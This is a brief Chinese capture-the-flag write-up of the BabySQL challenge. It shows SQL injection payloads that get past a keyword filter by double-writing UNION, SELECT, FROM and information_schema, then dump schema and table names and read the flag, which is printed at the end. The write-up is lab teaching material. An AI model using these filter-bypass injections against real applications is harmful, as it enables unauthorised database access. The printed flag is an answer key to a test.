18.[极客大挑战 2019]BabySQL1

进入靶场

随便输输

再输输

可以判断是单引号闭合

再随便输输

查询字段数量

得，过滤了

关键字也过滤了

只能双写了

根据回显，这样可以，只是需要改改

1,2不行

1,2,3行

1,2,3,4不行

可以尝试得到库名，表名了

库名    database()

DATABASE() 是 MySQL 中的一个函数，它返回当前选定（或默认）数据库的名称。

group_concat(table_name) infmation_schema.table_schema=databa' at line 1

过滤了，双写

查库名      group_concat(schema_name) frfromom infoorrmation_schema.schemata

 

查表名  seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema = 'ctf'

1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag

flag{e84e4db1-9040-4f81-9416-73a7eac9c6b1}